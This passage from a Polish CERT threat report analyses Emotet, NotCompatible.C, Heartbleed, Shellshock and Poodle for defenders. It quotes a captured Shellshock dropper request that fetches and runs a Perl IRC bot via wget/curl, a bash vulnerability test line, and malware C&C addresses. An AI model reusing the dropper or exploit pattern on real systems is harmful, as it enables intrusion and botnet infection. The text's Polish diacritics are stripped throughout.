od wielu innych trojanw bankowych, stara si unika systemu plikw izamiast niego korzysta zrejestru systemowego (to rwnie, przynajmniej wzaoeniu, miao zmniejszy stopie wykrywalnoci). Emotet mona uzna take
za zagroenie moduowe pobierany modu moe zosta
zmieniony na inny lub trojan bdzie wcyklu swojego ycia
pobiera wycznie jeden modu dodatkowy.
W styczniu 2015 roku wszystkie warianty Emoteta byy
wykrywane przez wikszo silnikw antywirusowych.
By unikn zagroenia, naley pamita ozainstalowaniu
wsystemie operacyjnym tego typu oprogramowania oraz
jego regularnej aktualizacji. Uytkownicy powinni by rwnie ostroni podczas korzystania zinternetu, nie instalowa aplikacji zniezaufanych rde ani nie klika wpodejrzane linki lub zaczniki wiadomoci e-mail.
Rysunek 36.
Przechwycone dane zapisywane
s wzakodowanej formie
wrejestrze systemowym
57
11.3 Zacznik 3. Analiza malware NotCompatible.C

(na urzdzenia mobilne zsystemem Android)
Rysunek 37.
Zrzut pokazujcy uruchomiony
plik instalacyjny ze zoliwym
oprogramowaniem
Rysunek 38.
Wykaz procesw uruchomionych
wrodowisku wirtualnym
zsystemem Android, wtym
zoliwy kod
Pierwszy raz malware o nazwie NotCompatible zosta

wykryty w2012 roku.
Na pocztku kod uywany by jako serwer proxy do kampanii spamowych. Do dzisiaj znacznie si rozrs, tworzc
ogromny botnet, zdolny m.in. do spamowania uytkownikw albo przeprowadzania zautomatyzowanych atakw,
np. na WordPress.
Jak wida, uruchomiony malware utworzy proces

onazwie com.security.patch. Mona to sprawdzi zpoziomu wczonego telefonu w zakadce pokazujcej wykaz
uruchomionych aplikacji oraz procesw wtelefonie zsystemem Android.
Zainfekowany telefon waciciela moe rwnie wykazywa wysze ni zwykle zuycie transferu danych ienergii.
Wykorzystujc NotCompatible jako proxy, atakujcy moe

wykona wiele czynnoci, w tym poszukiwanie wraliwych hostw w sieci, znajdowanie luk w zabezpieczeniach i naraonych wraliwych danych. Szacuje si, e
w samych Stanach Zjednoczonych liczba infekcji moe
siga 4,5 miliona zainfekowanych maszyn. Zasig infekcji
tego wirusa to ok. 20 000 maszyn dziennie; kanaem propagacji jest spam.
Mona si spotka ze sprzecznymi informacjami na temat
funkcjonalnoci tego malwareu. Jedne rda wskazuj,
e zainfekowany telefon suy do wamania si do prywatnych sieci komputerowych. Inne za, e gwn funkcjonalnoci jest tworzenie botnetu. Rozbienoci nie dziwi,
gdy analizowana prbka wykonuje oba zadania. Jeli zoliwe oprogramowanie zaatakuje urzdzenie nalece do
organizacji, moe si rwnie dosta do rodowiska korporacyjnego.
Zalecamy sprawdzenie, czy w telefonie nie jest uruchomiony proces onazwie podobnej jak com.security.patch,
dziaajcy jako usuga, ktrej nie wida wmenu telefonu.
Rekomendujemy, aby uytkownicy nie instalowali aplikacji
zniepotwierdzonego rda ani nie instalowali aplikacji, jeli
nie pamitaj, czy bya ona pobierana na telefon. Naley
rwnie wczy w telefonie funkcj blokowania instalacji
aplikacji zniezaufanych rde.
Najnowsza przeanalizowana przez CERT Orange Polska mutacja kodu, NotCompatible.C, zostaa wykryta
wzeszym roku. Wykazywanie jednoczenie obu gwnych
funkcjonalnoci utrudnio pocztkowo jego analiz. Ostatecznie jednak eksperci CERT Orange Polska przeprowadzili analiz laboratoryjn kodu zarwno statyczn, jak
idynamiczn.
Rysunek 39.
Malware widoczny wwykazie
uruchomionych aplikacji
Malware rozpowszechniany jest poprzez atak drive-by

download, wykorzystujcy podatno przegldarki na
platformie Android. Schemat ataku jest nastpujcy:
uytkownik odwiedza zainfekowan witryn, na ktrej
znajduje si zoliwy skrypt,
skrypt automatycznie pobiera plik,
by uruchomi zoliwy kod uytkownik akceptuje instalacj zoliwej aplikacji.
Po instalacji wirus uruchamiany jest dopiero przy nastpnym i kadym kolejnym restarcie telefonu. Pierwszy raz
w histori atak drive-by download zosta wycelowany
wurzdzenia zsystemem Android.

>> Rysunek 37-38.
58
Nazwa pliku ztrojanem: Update.apk

Suma kontrolna MD5: feace958b47c2249c6ab8ddf804cdcb6
Wielko wbajtach: 64808
Analizowana prbka przeznaczona jest jedynie na urzdzenia mobilne z platform Android. Po zdebugowaniu
pliku Update.apk w jego plikach rdowych (konkretnie:
AndroidManifest.xml) wida, do jakich zasobw odwouje
si malware:
android.permission.INTERNET pozwala aplikacji na
otwarcie gniazd sieciowych,
android.permission.ACCESS_NETWORK_STATE
pozwala aplikacji na dostp do informacji osieci,
android.permission.RECEIVE_BOOT_COMPLETED
pozwala na otrzymanie przez malware informacji
ozakoczeniu uruchamiania systemu oraz ozakresie
wersji rodowiska, w ktrym bdzie ona dziaa od
minSdkVersion=7 do targetSdkVersion=17.

>> Rysunek 40.
Malware ma zaimplementowan wzgldnie du liczb
funkcji, ktre zapewniaj mu bezproblemowe dziaanie
wkadej sieci. Ma midzy innymi:
wzajemne uwierzytelnianie si za pomoc klucza RSA
iRC4,
wsparcie protokow UDP iTCP,
komunikacj p2p pomidzy zainfekowanymi telefonami,
wiele serwerw Command&Control rozmieszczonych
wrnych lokalizacjach.
59
Rysunek 40.
Manifest analizowanego malware
Rysunek 41.
Komunikacja zserwerem C&C
Malware instaluje si wlokalizacji /data/data/com.security.

patch/.
Trojan wykorzystuje do zoon dwupoziomow technik komunikacji pomidzy zainfekowan maszyn aserwerami Command&Control. Pierwsza cz skada si
zserwera Command&Control penicego rol bramy wejciowej weryfikujcej jedynie komunikacj zainfekowanego
telefonu zserwerem.
Ma rwnie funkcj loadbalancera, ktry rozkada ruch
zainfekowanych telefonw.
Na poprzedniej stronie zosta przedstawiony schemat
komunikacji pomidzy zainfekowanym telefonemaserwerami Command&Control. Linie przerywane oznaczaj poczenie szyfrowane.

>> Rysunek 41.
Wymiana danych midzy serwerem Command&Control a telefonem odbywa si za pomoc wymiany klucza
publicznego RSA, ktry zapisany jest wpliku pub, doczonym do malware.
Na poprzedniej stronie zosta przedstawiony kod, ktry
przedstawia metod loadKey() klasy RSA po dekompilacji kodu malware.

>> Rysunek 42.
Rysunek 42.
Metoda loadKey() klasy RSA
Rysunek 43.
Zawarto pliku public.xml
Wpliku public.xml umieszczona jest warto ID dla zasobu oID 0x7f030001, co po zamianie na system dziesitny
daje nam liczb 2130903041, ktr wykorzystuje metoda
loadkey wpowyszym kodzie.

>> Rysunek 43.
Oprcz algorytmu RSA malware wykorzystuje algorytm
RC4, ktry suy mu do szyfrowania i deszyfrowania
danych wymienianych z serwerem Command&Control.
W pliku public.xml umieszczona jest rwnie warto
dla zasobu o id 0x7f030000, co po zamianie na system

dziesitny daje nam liczb 2130903040, ktr wykorzystuje metoda Load() klasy config do identyfikacji zasobu,
podobnie jak klucz RSA.

>> Rysunek 44.
Schemat dziaania wymiany kluczy RSA iRC4 wkomunikacji krok po kroku:
1. Zainfekowany telefon pobiera klucz publiczny RSA
zpliku pub.
2. Zainfekowany telefon generuje swoj par kluczy RSA:
klucz prywatny iklucz publiczny.
3. Zainfekowany telefon wysya klucz publiczny wygenerowany w punkcie 2 do serwera Command&Control.
4. Po odebraniu klucza publicznego z zainfekowanego
telefonu Command&Control generuje klucz RC4, szyfruje go kluczem publicznym przesanym przez malware, a nastpnie wysya go do telefonu. Telefon po
odebraniu zaszyfrowanego klucza RC4 odszyfrowuje
go swoim kluczem prywatnym.
5. Od tego momentu caa komunikacja bdzie szyfrowana algorytmem RC4 zkluczem symetrycznym wymienionym wczeniej w punkcie 4. Dalsza komunikacja
jest szyfrowana.
Co wicej, gdy wszystkie serwery Command&Control s
zablokowane, malware odpytuje przez protok P2P inne
zainfekowane urzdzenie onajnowszy plik konfiguracyjny
od gwnego serwera, by si dowiedzie odocelowy adres
serwera Command&Control. Taka funkcjonalno umoliwia wykonywanie pocze w sposb niezauwaony przez
zainfekowanego. Na nastpnej stronie zosta przedstawiony schemat komunikacji pomidzy dwoma zainfekowanymi telefonami apoprzez wykorzystanie P2P wchwili, gdy
adresy serwerw Command&Control s blokowane.

>> Rysunek 45.
Rysunek 44.
Zawarto klasy config oraz
metody Load()
60
61
Rysunek 45.
Komunikacja midzy telefonami
Rysunek 46.
Komunikacja zainfekowanego
telefonu zserwerem
Command&Control
Rysunek 47.
Zawarto metody init()
inicjalizacyjnej dla klasy
ThreadServer, ktra jest
odpowiedzialna za tworzenie
wszystkich mechanizmw
szyfrowania izestawiania pocze
Kod jest ciekawy z tego powodu, e szyfruje cae poczenie midzy klientem a serwerem Command&Control.
Mamy wic do czynienia z pierwszym malware posiadajcym dwustopniowy proces przekazywania skradzionych
danych. Pierwszy serwer Command&Control spenia funkcj bramy weryfikujcej, czy poczenie przychodzi od waciwego zainfekowanego telefonu, po czym ruch jest rozkadany iprzepuszczany do gwnego Command&Control,
przekazujc informacj o adresie gwnego Command&Control.
Zestawienie pocze na poprzedniej stronie przedstawia
komunikacj pomidzy pierwszym serwerem Command&Control azainfekowanym telefonem.

>> Rysunek 46.
Malware pobiera adres IP ze swojego pliku konfiguracyjnego znajdujcego si na telefonie wlokalizacji /data/data/
com.security.patch/files/data.bin.
Plik szyfrowany jest algorytmem RC4. Do jego zdekodowania podczas analizy statycznej uyty zosta nieco zmodyfikowany mechanizm odnaleziony wrdach malware.
Po zdekodowaniu pliku data.bin mona uzyska informacj oadresie IP, zjakim si czy zainfekowany telefon to
173.242.124.163 na porcie 443.
Trojan wykonuje rwnie operacje po stronie telefonu. Uruchamiajc si, odwouje si do klas ThreadServer.
android.permission.ACCESS_NETWORK_STATE
method call: Lcom/security/patch/ThreadServer/getInnet()Z calls
Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;

>> Rysunek 47.
Gdy dany adres IP Command&Controll jest blokowany,

malware wykorzystuje funkcjonalno p2p, pobierajc najnowszy plik konfiguracyjny od zainfekowanego wczeniej
telefonu. Funkcja ma na celu ominicie blokowania komunikacji na poziomie IP oraz DNS.
Takie dziaanie ma przewanie na celu ukrycie zoliwej
aktywnoci wirusa podczas komunikacji z Command&Control, by sondy antymalware nie mogy odrozrni
poprawnego ruchu sieciowego odzoliwego ruchu pomidzy zainfekowanym maszynami aCommand&Control.
Opisywane w poprzednim akapicie systemy do detekcji
ruchu nie potrafi zdefiniowa zoliwego ruchu, gdy jest
on szyfrowany midzy klientem aserwerem zwykorzystaniem pary kluczy oraz algorytmw RSA iRC4.
Podczas analizy dynamicznej przechwycono poczenia
na adres IP 173.242.124.163 na porcie 443 do pierwszego Command&Control. Domena, z jak ustanawia poczenie, to dedispace.com.
Na poprzedniej stronie przedstawiona zostaa komunikacja
telefonu, ktry jest ju zainfekowany iczy si zwieloma
alternatywnymi serwerami Command&Control znajdujcymi si wWielkiej Brytanii.

>> Rysunek 48.
Podsumowanie
Malware NotCompatible.C, jak wynika zanalizy, wyznacza
nowe trendy wtechnikach atakw na urzdzenia mobilne.
Jest nie tylko zagroeniem dla potencjalnych uytkownikw, lecz take dotyka sektora korporacyjnego.
Tym bardziej istotne staje si rygorystyczne przestrzeganie zasady nieinstalowania aplikacji zniezaufanych rde
lub aplikacji, ktrych uytkownik sam nie cign na swj
telefon.
Rysunek 48.
Komunikacja zserwerami C&C
62
63
11.4 Zacznik 4. Analiza podatnoci Heartbleed

Luka Heartbleed zostaa przypadkowo wprowadzona do
pakietu OpenSSL wgrudniu 2011 roku wramach realizacji rozszerzenia TLS proponowanego przez standard RFC
6520, natomiast informacje o jej odkryciu opublikowano
wkwietniu 2014 roku. Pozwala ona na odczytanie duych
fragmentw pamici (jednorazowo maksymalnie 64KB)
z procesu podatnego programu, co w konsekwencji
umoliwia wyciek wielu poufnych informacji, wtym przede
wszystkim prywatnego klucza uytkownika/serwera aplikacji, dziki ktremu atakujcy jest wstanie odszyfrowa
tre przechwyconej komunikacji, wstawia do jego kanau komunikacyjnego wasn tre (atak Man in The Middle)
oraz posugiwa si jego certyfikatem. Moliwe jest zatem
np. ledzenie i rejestrowanie interakcji z usugami WWW
(np. dziaa waplikacji pocztowej), awefekcie przechwycenie danych uwierzytelniajcych (m.in. bankowoci internetowej, co moe si sta punktem wyjcia do kradziey
danych lub rodkw zkont bankowych).
Podatna biblioteka jest niezwykle popularna w chwili
opublikowania informacji oluce podatnych byo okoo p
miliona dziaajcych w sieci serwerw WWW. Sytuacj
dodatkowo pogarsza fakt, e atakujcy podatn usug
wprzecitnej sieci usugowej nie zostawia po ataku praktycznie adnego ladu. Ztego powodu samo oszacowanie
liczby atakw (w tym zakoczonych sukcesem) oraz po-
niesionych wzwizku znimi strat jest trudne. Amerykaskie repozytorium National Vulnerability Database nadao
luce Heartbleed najwysz ocen (10), jeli chodzi o atwo wykorzystania (exploitability subscore).
Wprowadzenie mechanizmu Heartbeat miao na celu
umoliwienie stronom sesji SSL sprawdzenie, czy druga
strona wci poprawnie odbiera i nadaje wiadomoci,
oraz odwieenie wpisw dotyczcych stanu poczenia
wtabelach NAT16. Wtym celu wysya danie Heartbeat,
wktrym zawarta jest pewna liczba bajtw danych. Wze po drugiej stronie powinien odebra dane iodesa je
widentycznej postaci do nadawcy. Luka bezpieczestwa
wystpuje przy przetwarzaniu opisanego poniej zoliwego dania.
danie oraz odpowied powinny zosta zawarte wramce
onastpujcej strukturze:
struct {
HeartbeatMessageType type;
uint16 payload_length;
opaque payload[HeartbeatMessage.payload_
length];
opaque padding[padding_length];
} HeartbeatMessage;
W powyszej strukturze pole type ma dugo 1 bajta

imoe mie warto heartbeat_request (0x01) lub heartbeat_response (0x02), pole payload_length ma dugo
2 bajtw, pole payload powinno mie zadeklarowan
w payload_length dugo, a pole padding ma dugo
wyznaczan wtrakcie budowania ramki.
Bardzo wan czci struktury jest pole payload_length,
ktre zzaoenia powinno zawiera liczb bajtw danych
wysanych wdaniu. Jednak wpodatnej wersji OpenSSL
warto ta nie jest waden sposb weryfikowana, tj. odbiorca wierzy, e pakiet rzeczywicie zawiera zadeklarowan liczb bajtw. Tymczasem atakujcy moe w daniu
zawrze na przykad jeden bajt danych, deklarujc maksymaln moliw dugo tego pola, czyli 65535 bajtw.
Wtrakcie przetwarzania atakowana strona konstruuje pakiet, do ktrego kopiuje 65535 bajtw, ktre znajduj si
daleko poza buforem zawierajcym oryginalny jeden bajt.
Wten sposb atakujcy moe uzyska dostp do nieprzeznaczonych dla niego informacji, a czsto wrd nich
klucza prywatnego.
Przykadowy zapis transmisji z przeprowadzonego ataku
przedstawiono na poprzedniej stronie.
>> Rysunek 49.
Pierwszy wiersz z wartociami heksadecymalnymi (podwietlony na czerwono) to pakiet wysany przez atakujcego. Czci pakietu zaznaczone na zielono to czci struk-
tury SSL3_RECORD, ktra opakowuje ramki Heartbeat

izawiera informacje otypie ramki (0x18 heartbeat) wersji protokou (0x03, 0x1), dugoci opakowanych danych
(0x0003). Natomiast na to zaznaczone zostay czci
wiadomoci Heartbeat typ wiadomoci (0x1 danie)
oraz deklarowana dugo (0x4000 16384 bajty).
Drugi wiersz (podwietlony na niebiesko) to pakiet zawierajcy odpowied ofiary czyli 16384 bajty danych, ktre
wycieky.
CERT Orange Polska radzi:
Administratorzy serwerw, wykorzystujcy oprogramowanie OpenSSL, powinni zweryfikowa, czy korzystaj zaktualnej niepodatnej wersji (wersje gazi 1.0.0, 0.9.8 lub od
wersji 1.0.1g wzwy wgazi 1.0.1). Jeli przeprowadzenie
aktualizacji nie jest moliwe, naley zastosowa oprogramowanie typu IDS lub WAF, ktre odpowiednio skonfigurowane skutecznie blokuj prby wykorzystania luki Heartbleed.
Jako reakcja na podatnoci woprogramowaniu OpenSSL
powstay ich tzw. forki, czyli oddzielne projekty kontynuujce rozwj projektw oryginalnych od pewnego momentu,
lecz ze zmienionymi zaoeniami lub podejciem. Wrd
nich najwaniejsze to LibreSSL rozwijany przez deweloperw systemu OpenBSD (ktrzy krytycznie odnieli si
do projektu OpenSSL) oraz BoringSSL rozwijany przez
Google, ktre zapowiedziao wspprac w tym zakresie
zdeweloperami pozostaych projektw.
Rysunek 49.
Zapis transmisji przeprowadzonego
ataku
16
64
Technologia podwyszonej ochrony wprowadzona w Windows Vista/Windows 7, w zaoeniu ograniczajca dostp aplikacji momentu autoryzacji przez administratora
65
11.5 Zacznik 5. Analiza podatnoci Shellshock

Podatno Shellshock zostaa upubliczniona 24 wrzenia 2014 roku ijest ju do dokadnie opisana. Pokrtce mona podsumowa j wnastpujcy sposb: cz
programu bash, czyli popularnej powoki systemw operacyjnych, przeprowadza wykonanie treci, ktra powinna
zosta zinterpretowana jako dane. Opisywana luka pozwala na przekazanie do programu takiej treci za porednictwem zmiennych rodowiskowych.
Czynnikiem, ktry decyduje otym, e Shellshock jest jedn znajbardziej niebezpiecznych luk zaobserwowanych od
lat, jest fakt, i podatna powoka jest bardzo popularna.
Powoka bash jest ulubion powok wielu administratorw systemowych i bardzo czsto zostaje wybrana jako
domylna powoka dystrybucji systemw klasy Linux/
Unix. Jej popularno znacznie przewysza alternatywne
programy: dash, zsh etc. Dodatkowo, wiele programw
wchodzi w interakcj z systemem operacyjnym wanie
za porednictwem domylnej powoki przy wykorzystaniu
wywoania system, np.:
moduy obsugujce skrypty CGI wserwerach WWW,
interfejsy WWW wielu platform technologicznych
iurzdze,
popularne programy do przesyania plikw iuzyskiwania zdalnego dostpu do powoki.
Wrd programw korzystajcych zsystemowej powoki,
wic zagroonych atakiem wykorzystujcym omawian
podatno, znajdoway si si m.in.:
modu do serwera Apache - mod_cgi,
aplikacja cPanel,
produkty firmy F5, m.in. BIG-IP,
dhcpcd,
SSH,
Postfix,
Pure-FTPd,
OpenVPN.
Obecnie do luki Shellshock i luk z ni powizanych (np.

opartych na podobnym bdzie lub powstaych wwyniku
bdu wpoprawce) przypisano nastpujce identyfikatory
podatnoci wbazie CVE:

CVE-2014-6271

CVE-2014-7169

CVE-2014-7186

CVE-2014-7187

CVE-2014-6278

CVE-2014-6277
Ju pod koniec wrzenia udostpniono patche atajce
podatne wersje bash. Ich zastosowanie chroni przed atakami na wszystkie programy korzystajce ztej powoki.
Wcelu sprawdzenia, ktre programy korzystaj zpowoki
bash, najlepiej przejrze pliki wykonywalne wposzukiwaniu tych, ktre importuj wywoanie system. Tablic funkcji importowanych przez programy wformacie ELF mona
uzyska, korzystajc znarzdzi objdump lub readelf, np.:
locations=/bin /sbin
for loc in locations; do find $loc -type
f -executable; done | while read ff;
do echo $loc$ff; objdump -T $loc$ff |
grep system; done
W celu sprawdzenia, czy uywana wersja powoki bash
jest podatna, mona posuy si poniszym skryptem:
env X=() { :; }; echo Bash zawiera
luk CVE-2014-6271 bash -c id
Jeli po wywoaniu skryptu wywietla si tre Bash

zawiera luk CVE-2014-6271, to znaczy, e wuyciu jest
podatna wersja programu inaley j aktualizowa.
Cz internautw zapewne pamita epidemie robakw:
Sasser, wykorzystujcego luk CVE-2003-0533, odpowiedzialnego za straty oszacowane na 18 miliardw dolarw,
oraz Blaster (CVE-2003-0352, 320 mln dol.). Echa tych
epidemii mona obserwowa do dzisiaj pomimo wytonych wysikw majcych na celu zniwelowanie ich skutkw (np. blokowania na poziomie ISP portw, na ktrych
dziaaj podatne usugi). Wopinii ekspertw CERT Orange
Polska istnieje due ryzyko, e Shellshock doprowadzi do
podobnej epidemii wrd systemw dziaajcych pod kontrol systemw Linux iUnix.
Luka Shellshock ma cechy czynice j idealnym mechanizmem dostarczania odpowiednikw takich robakw do
systemw korzystajcych zbash. Najwaniejsze znich to:
zdalne wykonanie iblind injection
Robak, ktry skanuje sie internet w poszukiwaniu
podatnych usug, potrzebuje bardzo niewiele czasu i zasobw, by zainfekowa kolejn maszyn. Po
nawizaniu sesji w warstwie transportowej po prostu
wysya na olep szkodliwy adunek (exploit) i natychmiast przechodzi do infekowania kolejnej maszyny.
Wysany adunek, jeli trafi na podatn aplikacj, uzyskuje bezporedni dostp do powoki zainfekowanego
systemu. Jest to bardzo duy stosunek destrukcyjnego potencjau (potencjau propagacji) do jego kosztu.
atwo wykorzystania podatnoci
Funkcjonalny exploit17 mona napisa wdwch, trzech
linijkach jzyka bash. Nie trzeba omija zabezpiecze
stosu, radzi sobie z nowoczesnymi zabezpieczeniami przed exploitami ani zeskalacj uprawnie. Nawet
rednio dowiadczony programista moe skutecznie
uderzy wsamo serce systemu teleinformatycznego.
dua liczba usug korzystajcych zpodatnej aplikacji
Trudno precyzyjnie oszacowa liczb aplikacji stosujcych wywoanie system, ktre mog korzysta
zpodatnej wersji bash, ale wiadomo, e jest ich duo
i e s rnorodne. Zwiksza to diametralnie liczb
Rysunek 50.
moliwych do wykorzystania wektorw ataku. Moe

to by zarwno zoliwe danie HTTP wykonane
z drugiego koca wiata, jak i zoliwe odpowiedzi
serwera DHCP umieszczonego w sieci lokalnej bd
te ostatnio zaobserwowane prby atakw poprzez
SMTP. Ponadto niektre ztych usug s niemoliwe do
blokowania lub filtrowania z uwagi na duy wolumen
prawidowego ruchu na odpowiadajcych im portach.
Zesp CERT Orange Polska zaobserwowa rwnie kilka
dziaajcych dropperw18 wykorzystywanych m.in. do tworzenia botnetu przeznaczonego do wykonywania atakw
DDoS. Poniej przedstawiono jeden znich:
GET /cgi-bin/hi HTTP/1.0 404 402 - () { :;}; /bin/bash
-c \cd /tmp;wget http://xxx.xxx.193.10/ji;curl -O /tmp/ji
http://xxx.xxx.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\
Exploit przedstawiony na poprzedniej stronie ma za zadanie zainstalowa wzaatakowanym systemie inny zoliwy
program (w tym przypadku IRC-bot napisany w jzyku
Perl). Jego kod jest relatywnie zrozumiay, napisany wjzyku zblionym do ludzkiego i nie istnieje potrzeba przeprowadzania zaawansowanej inynierii wstecznej. Bot po
uruchomieniu stara si podczy do kanau C&C (serwera
IRC), anastpnie czeka na rozkazy ije wykonuje.

>> Rysunek 50.
Wrd obsugiwanych przez bota rozkazw znajduj si:

portscan skanowanie wybranego komputera wcelu
odkrycia niektrych popularnych usug (telnet, SSH,
FTP, WWW etc.),
tcpflood przeprowadzenie ataku DDOS na wybrany
cel za porednictwem protokou TCP,
google skanowanie wposzukiwaniu podatnych aplikacji WWW orazinfekowanie ich,
httpflood przeprowadzenie ataku DDOS na warstw
aplikacji na wybrany cel za porednictwem protokou
HTTP,
udpflood przeprowadzenie ataku DDOS na wybrany
cel za porednictwem protokou UDP.
>> Rysunek 511.
Kod odpowiedzialny za
przyczenie do kanau C&C
Rysunek 51.
Kod obsugujcy rozkazy
17
66
18
Program wykorzystujcy bd wystpujcy w oprogramowaniu, prowadzcy do przejcia kontroli nad dziaaniem procesu i wykonaniem odpowiednio spreparowanego kodu
Program instalujcy zoliwy kod na komputerze ofiary
67
Rysunek 52.
Kod obsugujcy rozkazy
cig dalszy
ikorzystania jedynie zaktualnych wersji oprogramowania

naley pamita o strategii zabezpieczania infrastruktury
zawierajcej elementy wielowarstwowej obrony, a take
minimalizacji powierzchni ataku.
Nie naley udostpnia usug, ktre nie s wymagane
do dziaania infrastruktury.
Naley wprowadza segmenty o zrnicowanym
poziomie ryzyka, ktre s od siebie odseparowane
iuniemoliwiaj lub utrudniaj eskalowanie zoliwego
oprogramowania na inne systemy (np. segment DMZ).
Prowadzi kontrol idziaania majce na celu minimalizacj powierzchni ataku, na przykad wyczajc lub
odcinajc dostp do niepotrzebnych usug.
Bot obsuguje rwnie polecenia wykorzystywane na serwerach IRC takich jak: connect, join, part, op, msg. Dodatkowo za pomoc polecenia eval pozwala na wykonanie
dowolnej przesanej przez botmastera komendy.

>> Rysunek 52.
W wybranych segmentach sieci Orange zaobserwowalimy prby wykorzystania luki shellshock kierowane na
porty serwerw WWW. Na Wykresie 22. przedstawiono
zestawienia zaobserwowanych da w poszczeglnych
miesicach na prbce zostatniego kwartau 2014 roku.

>> Wykres 22.
120
100
80
60
40
20
0
Wykres 22.
Wykres zoliwych da
10/1/2014
10/2/2014
10/3/2014
10/4/2014
10/5/2014
10/6/2014
10/7/2014
10/8/1014
10/9/2014
10/10/2014
10/11/2014
10/12/2014
10/13/2014
10/14/2014
10/15/2014
10/16/2014
10/17/2014
10/18/2014
10/19/2014
10/20/2014
10/21/2014
10/22/2014
10/23/2014
10/24/2014
10/25/2014
10/26/2014
10/27/2014
10/28/2014
10/29/2014
10/30/2014
10/31/2014
wpodziale na dni

Nawet tak dojrzae i rozpowszechnione oprogramowanie
jak powoka bash moe zawiera krytyczne podatnoci.
Dlatego oprcz wydajnego zarzdzania zagroeniami
80
60
40
12/16/2014
12/15/2014
12/14/2014
12/13/2014
12/12/2014
12/11/2014
12/9/2014
12/10/2014
12/8/1014
12/7/2014
12/6/2014
12/5/2014
12/4/2014
12/3/2014
12/2/2014
12/1/2014
20
0
Najwaniejsz rzecz, ktr powinni wykona administratorzy systemw Linux, Unix, MacOS X oraz innych
korzystajcych z programu bash, jest upewnienie si, e
zainstalowana zostaa najnowsza dostpna odporna wersja programu, ajeli tak nie jest niezwoczne wykonanie
aktualizacji.
Jeli wykonanie aktualizacji jest niemoliwe lub utrudnione,
naley zastosowa tymczasowe rodki zapobiegawcze,
takie jak ograniczenie dostpu do usug lub filtrowanie
treci z wykorzystaniem sygnatur. Przykadowe metody
wprowadzenia rodkw zapobiegawczych:
1. Filtrowanie da przy wykorzystaniu systemu WAF
lub przekierowanie ich na podstawie regu zdefiniowanych wpliku .htaccess.
2. Dopasowanie wzorcw iblokowanie za pomoc firewalla da, ktre wiadcz o prbie wykorzystania
podatnoci.
Wrd rde da prym wiod systemy znajdujce si

na terenie USA. Nie oznacza to, e atakujcy prowadz
swoje operacje ztego rejonu. Moliwe, e tak duy odsetek da jest wynikiem duej liczby zainfekowanych systemw podejmujcych automatycznie prby ataku.

>> Wykres 24.
11/ 1/2014
11/2/2014
11/3/2014
11/4/2014
11/5/2014
11/6/2014
11/7/2014
11/8/1014
11/9/2014
11/10/2014
11/11/2014
11/12/2014
11/13/2014
11/14/2014
11/15/2014
11/16/2014
11/17/ 2014
11/18/2014
11/19/2014
11/20/2014
11/21/2014
11/22/2014
11/23/2014
11/24/2014
11/25/2014
11/26/2014
11/27/2014
11/28/2014
11/29/2014
11/30/2014
100
80
60
40
20
0
dania zawieray gwnie odwoania do zasobw stanowicych skrypty cgi, ale mona zaobserwowa rwnie
prby przeamania zabezpiecze mechanizmw Server
Side Include (dynamicznie generujcy strony WWW
mechanizm skryptowy).

>> Wykres 23.
Wykres 23.
/start.phtml
/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/main.cgi
/cgi-bin/sys.cgi
/ kid,4002009697,id,
/cgi-bin/test.cgi
/cgi-bin/fire.cgi
/cgi-sys/FormMaiI-clone.cgi
/cgi-bin/
/cgi-bin-sdb/printenv
/cgi-bin/test/test.cgi
/cgi-bin/index.cgi
/cgi-bin/bash
/cgi-bin/phpS-cli
Najpopularniejsze dania
Wykres 24:
dania wysyane zkrajw
INNE 8%
US 39%
na podstawie adresw IP
SG 2%
udzia procentowy
CN 3%
UA 3%
0
50
100
150
200
PT 4%
BT 11%
RU 17%
68
DE 13%
69
Rysunek 53.
Tux jawny
11.6 Zacznik 6. Analiza podatnoci Poodle

Secure Socket Layer (SSL) to stworzony przez Netscape
w 1994 roku protok zabezpieczania transmisji sieciowych. Jego pierwsze wersje zawieray wiele saboci iluk
bezpieczestwa, dlatego do szybko dokonano przegldu protokou, by w1996 roku opublikowa go wwersji 3.0.
Od tego czasu SSL wyewoluowa wkolejne wersje protokou TLS, jednak wiele programw iurzdze wsieci internet nadal ich nie obsuguje, std w nowych protokoach
istniej mechanizmy zapewniajce wsteczn kompatybilno.
Rysunek 54.
Tux zaszyfrowany ECB
Rysunek 55.
14 padziernika 2014 roku czonkowie zespou Google

Security Team opublikowali informacje o odkrytej w protokole SSLv3 luce Poodle. Luka dotyczy nie konkretnej
implementacji SSL, ale caego protokou. Z tego powodu wszystkie wspierajce go implementacje s podatne
na ataki. Wwyniku ataku na omawian luk moliwe jest
odzyskanie czci tekstu jawnego transmisji.
Przygotowanie do wykorzystania luki polega na przejciu
przez atakujcego i takim zmodyfikowaniu transmisji sieciowej, eby zmusi strony transmisji do wybrania konkretnej wersji protokou podatnej na atak (tzw. downgrade dance). Dzieje si to na etapie uzgadniania wsplnego
zestawu szyfrujcego, jeszcze przed zestawieniem bezpiecznego poczenia.
Do przeprowadzenia demonstracyjnego ataku wykorzystano nastpujce cechy protokou SSL:
Wikszo algorytmw szyfrujcych uywanych przez
SSL to algorytmy blokowe, dziaajce wtrybie wizania
blokw (ang. Cipher-Block Chaining, CBC). Tryb ten
powinien zwiksza bezpieczestwo algorytmu dziki
kryptograficznemu powizaniu wszystkich blokw szyfrogramu. Winnym przypadku (gdyby algorytm dziaa
w trybie Electronic Code Book, ECB), takim samym
blokom tekstu jawnego zawsze odpowiadayby takie
same bloki szyfrogramu. Aby temu zapobiec, algorytm

szyfrujcy przy tworzeniu szyfrogramu poddaje kolejne bloki tekstu jawnego dziaaniu operacji XOR przy
uyciu poprzedniego szyfrogramu. Dziki temu dwm
identycznym blokom tekstu jawnego w pojedynczej
transmisji odpowiadaj dwa rne bloki tekstu szyfrowanego.
Aby wyobrazi sobie, w jaki sposb wizanie blokw
(CBC) wpywa na bezpieczestwo komunikacji, mona si
oprze na ilustracjach przedstawiajcych maskotk systemu Linux, sympatycznego pingwina Tuxa, wtrzech postaciach: jawnej, zaszyfrowanej wtrybie EBC iwtrybie CBC
(obrazki pochodz zWikipedia.com).

>> Rysunki 53-55.

Algorytmy w podatnych zestawach wyznaczaj warto tzw. funkcji MAC (ang. Message Authentication
Code) jedynie na czci tekstu jawnego, zupenie
ignorujc tzw. uzupenienie, czyli doczane na kocu
tekstu jawnego nieznaczce dane majce za zadanie
zaokrgli jego dugo do wielokrotnoci szerokoci
bloku. Dugo uzupenienia pomniejszona o 1 jest
